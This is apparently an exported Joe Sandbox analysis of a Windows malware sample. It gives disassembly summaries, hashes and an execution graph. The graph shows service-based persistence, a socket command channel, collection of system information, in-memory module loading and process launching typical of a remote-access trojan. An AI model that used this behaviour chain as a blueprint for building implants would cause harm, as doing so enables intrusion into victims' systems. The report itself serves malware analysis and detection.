                                                                                                                • Opcode Fuzzy Hash: a2d30baac50b7aef09bad71d35b38480cc5c2c5efd3fc645ad26383436725a82
                                                                                                                • Instruction Fuzzy Hash: 94016D76600359AFDB12DF94AC85EAFBBBCFB42318F00812EF901E2141E3709A15DB51
                                                                                                                Function 003C1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3636361484-0
                                                                                                                • Opcode ID: 86c1a77109f803ac3a479900b1dddcedca3ce2413718efa82a3b3c70762749b5
                                                                                                                • Instruction ID: de7b28ae56ce5969f22b8afd6e6ae852713075d1bf9cb86677a81f528ea2a37d
                                                                                                                • Opcode Fuzzy Hash: 86c1a77109f803ac3a479900b1dddcedca3ce2413718efa82a3b3c70762749b5
                                                                                                                • Instruction Fuzzy Hash: DF01F9B39142296FEB225770EC48FD677DCEB05310F15406AEA46E3091EA74EE849BA0
                                                                                                                Function 003C185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(003C1F92,00000000,?,00000000,?,?,?,003C1F92,?,00000000,00000002), ref: 003C1867
                                                                                                                • srand.MSVCRT ref: 003C1878
                                                                                                                • rand.MSVCRT ref: 003C1880
                                                                                                                • srand.MSVCRT ref: 003C1890
                                                                                                                • rand.MSVCRT ref: 003C1894
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Timerandsrand$FileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 4106363736-0
                                                                                                                • Opcode ID: 177e99b80ef17b7c0d4c23b82040904654e19dd29738546c52272adae4536685
                                                                                                                • Instruction ID: 4bbab118979f20559a1e6486db168170ef40e66eb28f256cdef3900b73ded315
                                                                                                                • Opcode Fuzzy Hash: 177e99b80ef17b7c0d4c23b82040904654e19dd29738546c52272adae4536685
                                                                                                                • Instruction Fuzzy Hash: 59E0D877A00228BBD700A7F9EC46C9EBBACEE84261F100527F601D3250E570FD448BB4
                                                                                                                Function 003C6014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 003C603C
                                                                                                                • GetProcAddress.KERNEL32(00000000,003C6064), ref: 003C604F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: kernel32.dll
                                                                                                                • API String ID: 1646373207-1793498882
                                                                                                                • Opcode ID: a9c0c2112eefff716ce5f7b356284bbb0378545e8d6440b90cc4173e26c7f084
                                                                                                                • Instruction ID: 3f6159de7ac2ff1d7394e5d593a61a1a05045a11dd2d8c1083ef74f396eefcbc
                                                                                                                • Opcode Fuzzy Hash: a9c0c2112eefff716ce5f7b356284bbb0378545e8d6440b90cc4173e26c7f084
                                                                                                                • Instruction Fuzzy Hash: DEF0CDB11442998BEF718EA4CC45FDE3BE4EB05700F50042EEA09CB282CB348A058B24

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:10%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:10.7%
                                                                                                                Total number of Nodes:642
                                                                                                                Total number of Limit Nodes:4
                                                                                                                execution_graph 1291 10002182 1296 1000219e 1291->1296 1294 10002191 ??3@YAXPAX 1295 10002198 1294->1295 1297 100021a8 __EH_prolog 1296->1297 1298 100021e5 1297->1298 1299 100021c7 TerminateThread CloseHandle 1297->1299 1302 1000388a CloseHandle 1298->1302 1299->1298 1299->1299 1301 1000218a 1301->1294 1301->1295 1302->1301 1303 10004c46 ??1type_info@@UAE 1304 10004c55 ??3@YAXPAX 1303->1304 1305 10004c5c 1303->1305 1304->1305 1233 10004e0a 1234 10004e1d 1233->1234 1239 10004e26 1233->1239 1236 10004e4e 1234->1236 1248 10003822 1234->1248 1235 10004e42 1252 10004d5f 1235->1252 1239->1234 1239->1235 1239->1236 1242 10004e6e 1242->1236 1243 10004e77 1242->1243 1245 10004d5f 3 API calls 1243->1245 1244 10004e66 1246 10004d5f 3 API calls 1244->1246 1247 10004e7f 1245->1247 1246->1242 1247->1236 1249 10003832 1248->1249 1250 1000383c 1248->1250 1259 10003e6b 1249->1259 1250->1236 1250->1242 1250->1244 1253 10004d67 1252->1253 1254 10004d9d 1253->1254 1255 10004d88 malloc 1253->1255 1257 10004dc7 1253->1257 1254->1234 1255->1254 1256 10004da1 _initterm 1255->1256 1256->1254 1257->1254 1258 10004df4 free 1257->1258 1258->1254 1260 10003e74 1259->1260 1261 10003e78 71 API calls 1259->1261 1260->1250 1261->1250 1306 1000428a 1312 10004c68 1306->1312 1308 10004294 memcpy SetEvent 1309 100042c4 1308->1309 1310 100042ca 1308->1310 1313 10004467 LoadLibraryA GetProcAddress GetProcAddress GetProcAddress 1309->1313 1312->1308 1314 100044d9 1313->1314 1317 100044ef 1314->1317 1319 10004369 7 API calls 1314->1319 1323 1000451a 1317->1323 1320 100043ea 1319->1320 1326 1000444c 1320->1326 1324 10004506 1323->1324 1325 1000451f FreeLibrary 1323->1325 1324->1310 1325->1324 1327 10004450 FreeLibrary 1326->1327 1328 10004457 1326->1328 1327->1328 1329 10004437 1328->1329 1330 1000445d FreeLibrary 1328->1330 1329->1317 1330->1329 1331 100025ca memcpy MessageBoxA 1332 10001014 1337 10001030 1332->1337 1335 10001023 ??3@YAXPAX 1336 1000102a 1335->1336 1338 1000101c 1337->1338 1339 1000103d VirtualFree 1337->1339 1338->1335 1338->1336 1339->1338 1340 10002c96 strlen 1341 10002d31 1340->1341 1342 10002cad ??2@YAPAXI memcpy strrchr 1340->1342 1343 10002d24 1342->1343 1344 10002cd5 1342->1344 1346 10002d26 ??3@YAXPAX 1343->1346 1351 10004529 LoadLibraryA GetProcAddress 1344->1351 1346->1341 1350 10002ced CreateProcessA 1350->1346 1352 10004571 1351->1352 1353 10004597 1352->1353 1354 10004578 GetProcAddress 1352->1354 1355 10002cdc 1353->1355 1356 1000459b FreeLibrary 1353->1356 1357 10004590 1354->1357 1355->1343 1367 1000248b GetFileAttributesA 1355->1367 1356->1355 1357->1353 1358 100045a9 CreateFileA 1357->1358 1359 10004637 Sleep GetProcAddress 1358->1359 1363 100045c5 1358->1363 1361 1000464e 1359->1361 1360 100045ca memset GetProcAddress 1360->1363 1361->1355 1364 10004657 FreeLibrary 1361->1364 1362 10004606 WriteFile 1362->1363 1366 1000462b CloseHandle 1362->1366 1363->1360 1363->1362 1365 10004628 1363->1365 1364->1355 1365->1366 1366->1359 1368 100024a5 1367->1368 1369 1000249a GetLastError 1367->1369 1368->1343 1368->1350 1369->1368 1370 10002d99 1371 10003e12 1370->1371 1372 10003e29 FreeLibrary 1371->1372 1373 10003e2c 1371->1373 1372->1373 1374 10003e33 FreeLibrary 1373->1374 1375 10003e36 1373->1375 1374->1375 1376 10003e40 1375->1376 1377 10003e3d FreeLibrary 1375->1377 1378 10003e47 FreeLibrary 1376->1378 1379 10003e4a 1376->1379 1377->1376 1378->1379 1380 10003e51 FreeLibrary 1379->1380 1381 10003e54 1379->1381 1380->1381 1382 10003e5b FreeLibrary 1381->1382 1383 10003e5e 1381->1383 1382->1383 1384 1000139a 1389 100013b6 1384->1389 1387 100013b0 1388 100013a9 ??3@YAXPAX 1388->1387 1403 10004c68 1389->1403 1391 100013c0 WaitForSingleObject 1392 100013f0 CloseHandle CloseHandle WSACleanup 1391->1392 1393 100013e9 1391->1393 1395 10001030 ctype VirtualFree 1392->1395 1404 1000180a setsockopt CancelIo InterlockedExchange closesocket SetEvent 1393->1404 1396 10001414 1395->1396 1397 10001030 ctype VirtualFree 1396->1397 1398 10001420 1397->1398 1399 10001030 ctype VirtualFree 1398->1399 1400 1000142c 1399->1400 1401 10001030 ctype VirtualFree 1400->1401 1402 100013a2 1401->1402 1402->1387 1402->1388 1403->1391 1404->1392 1405 1000389c 1406 100038b3 1405->1406 1417 100039ab 1405->1417 1407 100038c4 VirtualAlloc 1406->1407 1406->1417 1408 100038e1 VirtualAlloc 1407->1408 1409 100038f5 GetProcessHeap HeapAlloc VirtualAlloc VirtualAlloc memcpy 1407->1409 1408->1409 1408->1417 1418 100039ba 1409->1418 1412 10003961 1423 10003b9e LoadLibraryA GetProcAddress 1412->1423 1414 10003988 1414->1417 1436 10003d5d 1414->1436 1419 100039e3 1418->1419 1420 10003a62 1418->1420 1419->1420 1421 10003a25 VirtualAlloc memcpy 1419->1421 1422 10003a05 VirtualAlloc memset 1419->1422 1420->1412 1421->1419 1422->1419 1427 10003cb5 1423->1427 1429 10003be6 1423->1429 1424 10003cc4 FreeLibrary 1425 1000397d 1424->1425 1425->1414 1431 10003a67 1425->1431 1426 10003c0a LoadLibraryA 1426->1427 1428 10003c1e realloc 1426->1428 1427->1424 1427->1425 1428->1427 1428->1429 1429->1426 1429->1427 1430 10003c81 GetProcAddress 1429->1430 1430->1429 1432 10003b1f 1431->1432 1435 10003a88 1431->1435 1432->1414 1433 10003aad VirtualFree 1433->1435 1434 10003af8 VirtualProtect 1434->1435 1435->1432 1435->1433 1435->1434 1437 10003dd3 1436->1437 1440 10003d69 1436->1440 1437->1417 1438 10003db0 1441 10003dc4 GetProcessHeap HeapFree 1438->1441 1442 10003db7 VirtualFree 1438->1442 1439 10003da5 free 1439->1438 1440->1438 1440->1439 1443 10003d98 FreeLibrary 1440->1443 1441->1437 1442->1441 1443->1440 1444 1000315d 1447 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1444->1447 1446 10003170 WaitForSingleObject CloseHandle 1447->1446 1448 10002d9e 1449 10002da8 __EH_prolog 1448->1449 1450 10002db2 wsprintfA CreateMutexA 1449->1450 1451 10002df0 GetLastError 1450->1451 1452 10002e12 1450->1452 1451->1452 1454 10002dfd ReleaseMutex CloseHandle 1451->1454 1473 100012d4 1452->1473 1472 10002f56 1454->1472 1455 10002e28 rand Sleep 1456 10002e3d lstrcatA strcmp 1455->1456 1457 10002e84 GetTickCount 1456->1457 1467 10002e1b 1456->1467 1476 10001445 1457->1476 1459 10002ea6 GetTickCount 1486 10002144 1459->1486 1462 10002f0a WaitForSingleObject Sleep 1462->1467 1464 10002f33 1508 1000180a setsockopt CancelIo InterlockedExchange closesocket SetEvent 1464->1508 1465 1000219e ctype 3 API calls 1465->1467 1467->1455 1467->1456 1467->1459 1467->1462 1467->1464 1467->1465 1491 100036ba memset wsprintfA lstrlenA 1467->1491 1507 1000180a setsockopt CancelIo InterlockedExchange closesocket SetEvent 1467->1507 1468 10002f3b 1469 1000219e ctype 3 API calls 1468->1469 1470 10002f4a 1469->1470 1471 100013b6 ctype 10 API calls 1470->1471 1471->1472 1474 100012de __EH_prolog 1473->1474 1475 1000131c _CxxThrowException WSAStartup CreateEventA memcpy 1474->1475 1475->1467 1509 1000180a setsockopt CancelIo InterlockedExchange closesocket SetEvent 1476->1509 1478 10001455 ResetEvent socket 1479 100014b7 1478->1479 1480 10001477 gethostbyname 1478->1480 1479->1467 1480->1479 1481 10001486 htons connect 1480->1481 1481->1479 1482 100014bb setsockopt 1481->1482 1483 10001508 1482->1483 1484 100014db WSAIoctl 1482->1484 1510 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1483->1510 1484->1483 1511 10003842 1486->1511 1488 10002150 1489 1000216c 1488->1489 1490 1000215d lstrcpyA 1488->1490 1489->1467 1490->1489 1515 10004822 9 API calls 1491->1515 1497 100037a4 GlobalMemoryStatusEx 1498 100037c4 1497->1498 1534 100031d2 6 API calls 1498->1534 1507->1467 1508->1468 1509->1478 1510->1479 1514 10001a39 1511->1514 1513 10003858 CreateEventA 1513->1488 1514->1513 1516 100048f8 1515->1516 1517 100048fc 1516->1517 1521 100049aa 1516->1521 1523 1000499f 1516->1523 1524 10004932 1516->1524 1518 1000372e memset getsockname memcpy 1517->1518 1519 10004a5d FreeLibrary 1517->1519 1526 100035ea 1518->1526 1519->1518 1520 10004a3b lstrcpyA 1520->1517 1521->1517 1522 10004a04 wsprintfA 1521->1522 1522->1517 1523->1517 1523->1520 1524->1517 1524->1523 1525 1000498f strchr 1524->1525 1525->1524 1527 10004822 13 API calls 1526->1527 1528 1000360b lstrlenA 1527->1528 1529 10003627 GetVersionExA 1528->1529 1530 1000361b gethostname 1528->1530 1531 1000358c 1529->1531 1530->1529 1532 10004822 13 API calls 1531->1532 1533 100035c2 GetSystemInfo wsprintfA 1532->1533 1533->1497 1535 1000322b 1534->1535 1536 100032e2 FreeLibrary 1535->1536 1537 100032e5 1535->1537 1539 1000325d 1535->1539 1536->1537 1538 100032ea FreeLibrary 1537->1538 1537->1539 1538->1539 1540 1000366a LoadLibraryA GetProcAddress GetProcAddress 1539->1540 1541 1000369e 1540->1541 1542 100036b2 1541->1542 1543 100036ab FreeLibrary 1541->1543 1544 10003629 1542->1544 1543->1542 1545 10004822 13 API calls 1544->1545 1546 1000364a lstrlenA 1545->1546 1547 10003668 lstrcpyA 1546->1547 1548 1000365a lstrcpyA 1546->1548 1549 10001863 1547->1549 1548->1547 1578 100012a4 1549->1578 1552 10001883 ??2@YAPAXI 1554 10001895 memcpy 1552->1554 1555 10001978 1552->1555 1553 1000193a 1556 1000104c 6 API calls 1553->1556 1581 1000104c 1554->1581 1555->1467 1558 10001947 1556->1558 1560 100012a4 VirtualFree 1558->1560 1562 1000194f 1560->1562 1561 1000104c 6 API calls 1563 100018c4 1561->1563 1564 1000104c 6 API calls 1562->1564 1565 1000104c 6 API calls 1563->1565 1569 1000195a 1564->1569 1566 100018d1 1565->1566 1567 1000104c 6 API calls 1566->1567 1568 100018e5 1567->1568 1570 1000104c 6 API calls 1568->1570 1587 1000199f 1569->1587 1571 100018f0 ??3@YAXPAX ??2@YAPAXI memcpy 1570->1571 1573 100012a4 VirtualFree 1571->1573 1574 1000191c 1573->1574 1575 1000104c 6 API calls 1574->1575 1576 10001929 1575->1576 1576->1569 1577 1000192f ??3@YAXPAX 1576->1577 1577->1569 1579 100012bc 1578->1579 1580 100012ae VirtualFree 1578->1580 1579->1552 1579->1553 1580->1579 1582 10001055 1581->1582 1594 10001155 1582->1594 1585 10001068 1585->1561 1586 1000106c memcpy 1586->1585 1591 100019b5 1587->1591 1588 100019ff 1590 10001a06 send 1588->1590 1592 10001a1f 1588->1592 1589 100019ca send 1589->1591 1590->1588 1590->1592 1591->1588 1591->1589 1591->1592 1593 100019ea Sleep 1591->1593 1592->1555 1593->1588 1593->1591 1595 10001164 1594->1595 1596 10001172 ceil _ftol VirtualAlloc 1595->1596 1597 10001063 1595->1597 1596->1597 1598 100011b4 1596->1598 1597->1585 1597->1586 1599 100011c2 memcpy 1598->1599 1600 100011cf 1598->1600 1599->1600 1600->1597 1601 100011d6 VirtualFree 1600->1601 1601->1597 1602 10002f67 1607 100020c8 6 API calls 1602->1607 1604 10002f6c 1608 10001f48 strlen 1604->1608 1607->1604 1609 10001f58 1608->1609 1617 10001fb6 1608->1617 1618 10001acf OpenSCManagerA 1609->1618 1612 10001fa1 1628 10004a93 7 API calls 1612->1628 1613 10001f77 OpenServiceA 1614 10001f99 CloseServiceHandle 1613->1614 1615 10001f8b DeleteService CloseServiceHandle 1613->1615 1614->1612 1615->1614 1619 10001b56 OpenSCManagerA 1618->1619 1620 10001aeb OpenServiceA 1618->1620 1619->1612 1619->1613 1621 10001b01 QueryServiceStatus 1620->1621 1622 10001b49 CloseServiceHandle 1620->1622 1623 10001b10 1621->1623 1624 10001b42 CloseServiceHandle 1621->1624 1622->1619 1623->1624 1625 10001b16 ControlService 1623->1625 1624->1622 1625->1624 1626 10001b27 1625->1626 1626->1624 1627 10001b2d Sleep QueryServiceStatus 1626->1627 1627->1626 1632 10004b1d 1628->1632 1629 10004c01 FreeLibrary 1630 10004c08 1629->1630 1630->1617 1631 10004bd0 lstrlenA 1633 10004b20 1631->1633 1632->1631 1632->1633 1633->1629 1633->1630 1634 1000152b 1635 10001538 1634->1635 1636 10001563 select 1635->1636 1639 10001590 memset recv 1635->1639 1640 100015eb 1635->1640 1642 10001603 1635->1642 1636->1635 1637 100015ed 1636->1637 1669 1000180a setsockopt CancelIo InterlockedExchange closesocket SetEvent 1637->1669 1639->1635 1639->1637 1643 1000160d __EH_prolog 1642->1643 1644 10001672 1643->1644 1645 1000162c memcmp 1643->1645 1646 1000104c 6 API calls 1644->1646 1645->1644 1647 10001641 1645->1647 1657 10001680 1646->1657 1649 10001863 16 API calls 1647->1649 1648 10001661 1648->1635 1649->1648 1650 10001697 memcpy memcmp 1651 100016b9 _CxxThrowException 1650->1651 1650->1657 1651->1657 1652 100016da memcpy 1652->1648 1652->1657 1653 100010cf 6 API calls 1653->1657 1656 100017bd _CxxThrowException 1658 100017e2 1656->1658 1659 100017d9 ??3@YAXPAX 1656->1659 1657->1648 1657->1650 1657->1652 1657->1653 1657->1656 1663 100017a4 ??3@YAXPAX ??3@YAXPAX 1657->1663 1665 100012a4 VirtualFree 1657->1665 1668 1000104c 6 API calls 1657->1668 1670 100010cf 1657->1670 1660 100017f0 1658->1660 1661 100017e7 ??3@YAXPAX 1658->1661 1659->1658 1662 100012a4 VirtualFree 1660->1662 1661->1660 1664 100017fb 1662->1664 1663->1657 1666 10001863 16 API calls 1664->1666 1665->1657 1667 10001804 1666->1667 1667->1635 1668->1657 1669->1640 1672 100010d8 1670->1672 1671 100010e0 ??2@YAPAXI ??2@YAPAXI 1671->1656 1671->1657 1672->1671 1673 100010fc memcpy 1672->1673 1674 10001117 1672->1674 1673->1674 1676 100011fb 1674->1676 1677 1000120a 1676->1677 1678 10001211 ceil _ftol 1677->1678 1682 10001243 1677->1682 1679 1000123f 1678->1679 1680 10001247 VirtualAlloc 1679->1680 1679->1682 1681 10001262 1680->1681 1680->1682 1683 10001270 memcpy 1681->1683 1684 1000127d VirtualFree 1681->1684 1682->1671 1683->1684 1684->1682 1685 100024ac printf 1686 100024c4 printf 1685->1686 1688 100024d3 1685->1688 1687 1000257f 1686->1687 1689 100024ef memset memcpy ??2@YAPAXI memcpy 1688->1689 1700 1000389d 1689->1700 1692 10002540 1713 10003cd2 1692->1713 1693 10002532 printf 1699 10002559 1693->1699 1696 10002560 ??3@YAXPAX 1697 10002567 printf 1696->1697 1697->1687 1698 10003d5d 5 API calls 1698->1699 1699->1696 1699->1697 1701 100038b3 1700->1701 1711 10002526 1700->1711 1702 100038c4 VirtualAlloc 1701->1702 1701->1711 1703 100038e1 VirtualAlloc 1702->1703 1704 100038f5 GetProcessHeap HeapAlloc VirtualAlloc VirtualAlloc memcpy 1702->1704 1703->1704 1703->1711 1705 100039ba 4 API calls 1704->1705 1706 10003961 1705->1706 1707 10003b9e 6 API calls 1706->1707 1708 1000397d 1707->1708 1710 10003a67 2 API calls 1708->1710 1712 10003988 1708->1712 1709 10003d5d 5 API calls 1709->1711 1710->1712 1711->1692 1711->1693 1712->1709 1712->1711 1715 1000254b 1713->1715 1716 10003cee 1713->1716 1714 10003d15 _stricmp 1714->1715 1714->1716 1715->1698 1716->1714 1716->1715 1717 1000246d 1720 100023fa printf 1717->1720 1721 1000389d 24 API calls 1720->1721 1722 10002414 1721->1722 1723 10002429 1722->1723 1724 1000241c OutputDebugStringA 1722->1724 1726 10003cd2 _stricmp 1723->1726 1725 10002448 printf 1724->1725 1728 10002468 1725->1728 1729 10002458 VirtualFree 1725->1729 1727 10002434 1726->1727 1730 10003d5d 5 API calls 1727->1730 1729->1728 1731 10002445 1730->1731 1731->1725 1262 1000336e strncpy wcstombs RegisterServiceCtrlHandlerA 1263 10003585 1262->1263 1264 100033c6 FreeConsole 1262->1264 1282 1000318a SetServiceStatus 1264->1282 1266 100033d6 1283 1000318a SetServiceStatus 1266->1283 1268 100033df GetVersionExA 1269 10003566 Sleep 1268->1269 1270 10003406 1268->1270 1269->1263 1271 10003578 1269->1271 1272 10003419 8 API calls 1270->1272 1273 1000340f MainThread 1270->1273 1271->1263 1271->1269 1274 100034aa GetLastError 1272->1274 1275 100034cb GetModuleFileNameA wsprintfA 1272->1275 1273->1269 1274->1275 1276 100034b5 wsprintfA 1274->1276 1277 10003507 Sleep GetExitCodeProcess 1275->1277 1276->1275 1278 10003526 CloseHandle Sleep 1277->1278 1281 10003544 1277->1281 1284 10001fbd 7 API calls 1278->1284 1280 10003556 WaitForSingleObject CloseHandle 1280->1269 1281->1277 1281->1280 1282->1266 1283->1268 1285 100020b1 1284->1285 1286 10002059 SetTokenInformation 1284->1286 1288 100020c1 1285->1288 1289 100020b8 FreeLibrary 1285->1289 1290 10002079 CreateProcessAsUserA CloseHandle CloseHandle 1286->1290 1288->1281 1289->1288 1290->1285 1732 1000386e 1737 1000388a CloseHandle 1732->1737 1734 10003876 1735 10003884 1734->1735 1736 1000387d ??3@YAXPAX 1734->1736 1736->1735 1737->1734 1738 10003134 1743 10001e37 1738->1743 1763 10004c68 1743->1763 1745 10001e41 wsprintfA 1764 10001b5b OpenSCManagerA 1745->1764 1748 10004a93 9 API calls 1749 10001ede memset lstrcpyA lstrlenA 1748->1749 1750 10004a93 9 API calls 1749->1750 1751 10001f23 1750->1751 1776 10001a43 OpenSCManagerA 1751->1776 1754 1000304f wsprintfA strlen 1755 1000308c strlen 1754->1755 1756 100030ad strlen 1754->1756 1758 10004a93 9 API calls 1755->1758 1757 10004a93 9 API calls 1756->1757 1759 100030d0 GetLocalTime wsprintfA strlen 1757->1759 1760 100030aa 1758->1760 1761 10004a93 9 API calls 1759->1761 1760->1756 1762 1000312c 1761->1762 1763->1745 1765 10001ba3 _local_unwind2 1764->1765 1766 10001bb8 CreateServiceA 1764->1766 1767 10001e06 wsprintfA strlen 1765->1767 1768 10001c25 ChangeServiceConfig2A ChangeServiceConfig2A wsprintfA strlen 1766->1768 1769 10001bf5 GetLastError 1766->1769 1767->1748 1770 10004a93 9 API calls 1768->1770 1769->1768 1771 10001c02 OpenServiceA 1769->1771 1772 10001dea StartServiceA 1770->1772 1773 10001c1c StartServiceA 1771->1773 1774 10001dfa 1771->1774 1772->1774 1773->1768 1788 10001e1d 1774->1788 1777 10001a60 OpenServiceA 1776->1777 1778 10001ac8 1776->1778 1779 10001ac1 1777->1779 1780 10001a75 StartServiceA 1777->1780 1778->1754 1781 10001ac2 CloseServiceHandle 1779->1781 1780->1778 1782 10001a84 GetLastError 1780->1782 1781->1778 1783 10001a91 CloseServiceHandle 1782->1783 1784 10001a9b QueryServiceStatus 1782->1784 1783->1781 1785 10001aba CloseServiceHandle 1784->1785 1786 10001aaa 1784->1786 1785->1779 1786->1785 1787 10001ab0 Sleep 1786->1787 1787->1784 1789 10001e21 CloseServiceHandle 1788->1789 1790 10001e28 1788->1790 1789->1790 1791 10001e36 1790->1791 1792 10001e2d CloseServiceHandle 1790->1792 1791->1767 1792->1791 1793 10002d74 1794 10002d79 1793->1794 1797 10004d20 1794->1797 1800 10004cf4 1797->1800 1799 10002d92 1801 10004d09 __dllonexit 1800->1801 1802 10004cfd _onexit 1800->1802 1801->1799 1802->1799 1803 10002d35 strrchr 1804 10002d70 1803->1804 1805 10002d49 1803->1805 1806 10004529 12 API calls 1805->1806 1807 10002d53 1806->1807 1807->1804 1808 1000248b 2 API calls 1807->1808 1809 10002d5f 1808->1809 1809->1804 1812 1000273d GetModuleFileNameA 1809->1812 1811 10002d6a 1813 10002764 wsprintfA 1812->1813 1814 10002785 wsprintfA 1812->1814 1815 100027a1 WinExec 1813->1815 1814->1815 1815->1811 1816 10003df6 1821 10003e12 1816->1821 1819 10003e05 ??3@YAXPAX 1820 10003e0c 1819->1820 1822 10003e29 FreeLibrary 1821->1822 1823 10003e2c 1821->1823 1822->1823 1824 10003e33 FreeLibrary 1823->1824 1825 10003e36 1823->1825 1824->1825 1826 10003e40 1825->1826 1827 10003e3d FreeLibrary 1825->1827 1828 10003e47 FreeLibrary 1826->1828 1829 10003e4a 1826->1829 1827->1826 1828->1829 1830 10003e51 FreeLibrary 1829->1830 1831 10003e54 1829->1831 1830->1831 1832 10003e5b FreeLibrary 1831->1832 1833 10003dfe 1831->1833 1832->1833 1833->1819 1833->1820 1834 100032f7 1835 10003347 1834->1835 1836 100032ff 1834->1836 1852 1000318a SetServiceStatus 1835->1852 1838 10003302 1836->1838 1839 10003335 1836->1839 1841 1000331b 1838->1841 1843 10003305 1838->1843 1851 1000318a SetServiceStatus 1839->1851 1840 10003353 Sleep 1840->1843 1849 1000318a SetServiceStatus 1841->1849 1846 10003330 1843->1846 1853 1000318a SetServiceStatus 1843->1853 1845 10003327 1850 1000318a SetServiceStatus 1845->1850 1849->1845 1850->1846 1851->1845 1852->1840 1853->1846 1854 10002f7b 1855 10001acf 8 API calls 1854->1855 1856 10002f90 1855->1856 1857 10003043 1856->1857 1865 100020c8 6 API calls 1856->1865 1859 10002f9f wsprintfA CreateProcessA GetModuleFileNameA GetFileAttributesA 1860 10003013 1859->1860 1861 10003018 GetLastError 1860->1861 1862 1000303d 1860->1862 1861->1862 1863 10003023 Sleep GetFileAttributesA 1861->1863 1864 10001a43 9 API calls 1862->1864 1863->1860 1864->1857 1865->1859 1866 100021ff 1867 10002216 1866->1867 1899 10002239 1866->1899 1868 1000235f VirtualAlloc 1867->1868 1869 1000221f 1867->1869 1870 1000237e memcpy 1868->1870 1868->1899 1871 100022c0 1869->1871 1872 10002284 1869->1872 1873 10002308 1869->1873 1874 100022aa 1869->1874 1875 1000223e 1869->1875 1876 1000222f 1869->1876 1877 100022cf 1869->1877 1878 10002251 1869->1878 1879 10002312 VirtualAlloc 1869->1879 1880 10002293 1869->1880 1881 10002353 1869->1881 1882 100022b5 1869->1882 1883 1000229f 1869->1883 1869->1899 1960 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1870->1960 1949 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1871->1949 1912 10002bc3 strlen 1872->1912 1950 10002583 1873->1950 1933 10002b96 1874->1933 1906 100026df wsprintfA 1875->1906 1901 100025a2 1876->1901 1944 1000260e LocalAlloc 1877->1944 1911 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1878->1911 1887 10002330 memcpy 1879->1887 1879->1899 1889 1000273d 4 API calls 1880->1889 1955 1000265e 1881->1955 1939 10002b58 EnumWindows 1882->1939 1922 100029b6 memcpy CreateFileA 1883->1922 1897 100023fa 29 API calls 1887->1897 1889->1899 1896 10002264 Sleep 1896->1899 1897->1899 1961 10004666 6 API calls 1901->1961 1904 10004666 11 API calls 1905 100025c6 1904->1905 1905->1899 1907 10002713 strlen 1906->1907 1908 1000270e 1906->1908 1909 10004a93 9 API calls 1907->1909 1908->1907 1910 10002737 1909->1910 1910->1899 1911->1896 1913 10002c90 1912->1913 1914 10002bdf memset 1912->1914 1913->1899 1915 10004822 13 API calls 1914->1915 1916 10002c10 1915->1916 1916->1913 1917 10002c17 lstrlenA 1916->1917 1917->1913 1918 10002c28 strstr 1917->1918 1918->1913 1919 10002c40 lstrcpyA 1918->1919 1920 10002c60 CreateProcessA 1919->1920 1920->1913 1923 10002a32 1922->1923 1924 10002a12 WriteFile 1922->1924 1923->1899 1924->1923 1925 10002a39 CloseHandle strlen 1924->1925 1926 10002a51 wsprintfA 1925->1926 1927 10002a76 lstrcpyA 1925->1927 1928 10002a8a 